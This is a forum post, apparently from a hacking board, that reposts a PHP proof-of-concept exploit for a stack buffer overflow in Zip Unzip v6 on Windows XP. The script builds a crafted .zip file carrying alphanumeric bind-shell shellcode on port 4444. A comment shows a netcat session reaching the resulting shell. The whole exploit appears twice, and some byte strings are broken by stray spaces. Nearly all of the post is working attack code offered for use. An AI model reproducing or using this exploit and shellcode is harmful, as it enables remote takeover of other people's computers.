PrinceofHacking
04-04-2010, 10:53 PM
<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Zip Unzip v6 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - [Only registered and activated users can see links]
Download: [Only registered and activated users can see links]
Platform: Windows XP sp3
Greetz to: Corelan Security Team & fl0 fl0w
[Only registered and activated users can see links]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may
cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Sorry, not universal.. any ppr from the target application uses 0x01 which
kills our ascii buffer. ..Enjoy.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
mrme@backtrack:~$ nc -v 192.168.1.3 4444
192.168.1.3: inverse host lookup failed: Unknown server error : Connection
timed out
(UNKNOWN) [192.168.1.3] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
G:\0day\zip0day>
*/
// local file header
$lf_header =
"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\x CE\x34\x00\x00\x00&
quot;.
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x 00";
// central directory file header
$cdf_header =
"\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\x B7\xAC\xCE\x34\x00\
x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x 00\x00\x00\x00\x00\
x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
// end of central directory record
$efcdr_record =
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";
// bind shell on port 4444, edx as base reg
$______sc =
"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJ I8kWssixkDExhZXkOyo
KO0OaYri".
"aY3yQYW9rqQJPV3d68efEcfPPVpXDtQQTpQRUfRhw8dpQRTsFP w2QSpV3hUb0Bw4QR0H4
tqQP2QQ2d4paQctR".
"tQRqTRqsr6PqQw4SqpVpX4tRz4xsrbd0JPOpMpNRobldvbkrnP OrdPJPN1Y0OBopOroPO
pO2oQRpVPK0XBnsf".
"qVp2rf4rpKVXqUstRnssBkShBn1W0ErpaZCgRapPpOpNrkwH0O dtPJg1RkpXPOpUsrRr1
QTprk2n1SPNg2Bss".
"yRtPKTxQVQC0KPXG1tpV0RnraUcQRBlG9VYRnrjrfv8crpL3vp WQWp0cqPLpL0LpMPP1Q
vPRdRl2kpNcvPORk".
"WCSvpUg6CrqZqRcuPWSsbn0K1HboPUSvpRsqrpBkPNW8tvPKv8 2npPpKEd0K0HpO3eBnS
qqQVP0KPNPCdpPNp".
"RrkW8RivXPNtvpFW2RncqqQSfSspLQQ2cg2rlsv2fpK2hqRcdC r7CpKpXW2aT2npPrkVX
3raWRnra0MpJPK2h".
"72Cd1Z2p60Ue3zW6V0V8bpW4RppPrnrnSrDuRoPO1XPMsqrspK PM0HufpCseQXPVCzFVr
cucRdP3pJf6QWbg7".
"3PGstP3PO0U1V65ro2opBRmQZrvbkpLbmRnpNRoPKpSW2aUPOB o78bmPOvUcyaX75PNrh
rv3qw8rmpN3zBpW4".
"TpsupUpLPFCtRpRopOQRrmszvVSypMRiPPQUpO0MszW71ERoBo qXPMSsW52cPEQSpUSsp
UQSbessfTw3RebcU".
"dssTu2o2o1R2m1XrvPJ66QQCqPNvUCxp6ssp5rivXCq0Nw5Rip JQVPFQZ2lPQW2v777pL
swburoroQXpMpLP6".
"SrUaqQReg57EbopOaRPMpJtvCvpJPMrjBpw2cypNPG2upOBoqX pMPCwEpE5eRoRoqRPMp
JP6w50Nri0DQXehq".
"YpT1WRupObo78PM2bbu3veesvReG5duPOpO1RbmQSg90J2vcwr n1YVW2hrlg9GGW7RePO
pOBh0MG52uRoRo1R".
"2mW8EfpLPV0FaVpHwFaZcvcspVPMBvw9P8pEPNblpV2bqEQYse G9pRrnblSy2hw7PNRl5
fCvRtw9V8qTPNsqp".
"CaRPLg3POPLqZ2ppOpDRt2mdrBpPO3tBt2nSbrc1YpMshpL1WP JpS0KpJ0KpJ0KSzczSv
QTaG0P0ObcpKBhpQ".
"PORoqUF72fRtbopOCx0MpKcug7fUSt6U3qwESqQEqQuepLBfra pPqQFUbaSuSuVUaQQUb
o0O1RrmQZ2v0MRj2".
"iBmaUTpf0PLPCvUpORoaX0Mrlv6roPOroBo0GFSRoro2bRmRkC hcwg5PN0OSsVX0FPLsv
efPOro3xpMrdRupO".
"pOSrbm3z4vPOrn60PLpB2n3rUfSs2u0OroQXPMPO0OqRRm2zA";
$___offset = 4064;
$___exploit = str_repeat("\x41",39).
"\x73\x07\x41\x41".
"\x76\x50\x47\x73". // 0x73475076 [msvbvm60.dll]
str_repeat("\x61",32).
str_repeat("\x5a",2).
str_repeat("\x43",510).
$______sc;
$___exploit .=
str_repeat("\x43",$___offset-strlen($___exploit)).
"\x2e\x74\x78\x74";
$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$ef cdr_record;
file_put_contents("cst-zipunzip.zip",$_____b00m);
?>
Enjoy
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Zip Unzip v6 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - [Only registered and activated users can see links]
Download: [Only registered and activated users can see links]
Platform: Windows XP sp3
Greetz to: Corelan Security Team & fl0 fl0w
[Only registered and activated users can see links]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may
cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Sorry, not universal.. any ppr from the target application uses 0x01 which
kills our ascii buffer. ..Enjoy.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~
~~
mrme@backtrack:~$ nc -v 192.168.1.3 4444
192.168.1.3: inverse host lookup failed: Unknown server error : Connection
timed out
(UNKNOWN) [192.168.1.3] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
G:\0day\zip0day>
*/
// local file header
$lf_header =
"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\x CE\x34\x00\x00\x00&
quot;.
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x 00";
// central directory file header
$cdf_header =
"\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\x B7\xAC\xCE\x34\x00\
x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x 00\x00\x00\x00\x00\
x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
// end of central directory record
$efcdr_record =
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";
// bind shell on port 4444, edx as base reg
$______sc =
"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJ I8kWssixkDExhZXkOyo
KO0OaYri".
"aY3yQYW9rqQJPV3d68efEcfPPVpXDtQQTpQRUfRhw8dpQRTsFP w2QSpV3hUb0Bw4QR0H4
tqQP2QQ2d4paQctR".
"tQRqTRqsr6PqQw4SqpVpX4tRz4xsrbd0JPOpMpNRobldvbkrnP OrdPJPN1Y0OBopOroPO
pO2oQRpVPK0XBnsf".
"qVp2rf4rpKVXqUstRnssBkShBn1W0ErpaZCgRapPpOpNrkwH0O dtPJg1RkpXPOpUsrRr1
QTprk2n1SPNg2Bss".
"yRtPKTxQVQC0KPXG1tpV0RnraUcQRBlG9VYRnrjrfv8crpL3vp WQWp0cqPLpL0LpMPP1Q
vPRdRl2kpNcvPORk".
"WCSvpUg6CrqZqRcuPWSsbn0K1HboPUSvpRsqrpBkPNW8tvPKv8 2npPpKEd0K0HpO3eBnS
qqQVP0KPNPCdpPNp".
"RrkW8RivXPNtvpFW2RncqqQSfSspLQQ2cg2rlsv2fpK2hqRcdC r7CpKpXW2aT2npPrkVX
3raWRnra0MpJPK2h".
"72Cd1Z2p60Ue3zW6V0V8bpW4RppPrnrnSrDuRoPO1XPMsqrspK PM0HufpCseQXPVCzFVr
cucRdP3pJf6QWbg7".
"3PGstP3PO0U1V65ro2opBRmQZrvbkpLbmRnpNRoPKpSW2aUPOB o78bmPOvUcyaX75PNrh
rv3qw8rmpN3zBpW4".
"TpsupUpLPFCtRpRopOQRrmszvVSypMRiPPQUpO0MszW71ERoBo qXPMSsW52cPEQSpUSsp
UQSbessfTw3RebcU".
"dssTu2o2o1R2m1XrvPJ66QQCqPNvUCxp6ssp5rivXCq0Nw5Rip JQVPFQZ2lPQW2v777pL
swburoroQXpMpLP6".
"SrUaqQReg57EbopOaRPMpJtvCvpJPMrjBpw2cypNPG2upOBoqX pMPCwEpE5eRoRoqRPMp
JP6w50Nri0DQXehq".
"YpT1WRupObo78PM2bbu3veesvReG5duPOpO1RbmQSg90J2vcwr n1YVW2hrlg9GGW7RePO
pOBh0MG52uRoRo1R".
"2mW8EfpLPV0FaVpHwFaZcvcspVPMBvw9P8pEPNblpV2bqEQYse G9pRrnblSy2hw7PNRl5
fCvRtw9V8qTPNsqp".
"CaRPLg3POPLqZ2ppOpDRt2mdrBpPO3tBt2nSbrc1YpMshpL1WP JpS0KpJ0KpJ0KSzczSv
QTaG0P0ObcpKBhpQ".
"PORoqUF72fRtbopOCx0MpKcug7fUSt6U3qwESqQEqQuepLBfra pPqQFUbaSuSuVUaQQUb
o0O1RrmQZ2v0MRj2".
"iBmaUTpf0PLPCvUpORoaX0Mrlv6roPOroBo0GFSRoro2bRmRkC hcwg5PN0OSsVX0FPLsv
efPOro3xpMrdRupO".
"pOSrbm3z4vPOrn60PLpB2n3rUfSs2u0OroQXPMPO0OqRRm2zA";
$___offset = 4064;
$___exploit = str_repeat("\x41",39).
"\x73\x07\x41\x41".
"\x76\x50\x47\x73". // 0x73475076 [msvbvm60.dll]
str_repeat("\x61",32).
str_repeat("\x5a",2).
str_repeat("\x43",510).
$______sc;
$___exploit .=
str_repeat("\x43",$___offset-strlen($___exploit)).
"\x2e\x74\x78\x74";
$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$ef cdr_record;
file_put_contents("cst-zipunzip.zip",$_____b00m);
?>
Enjoy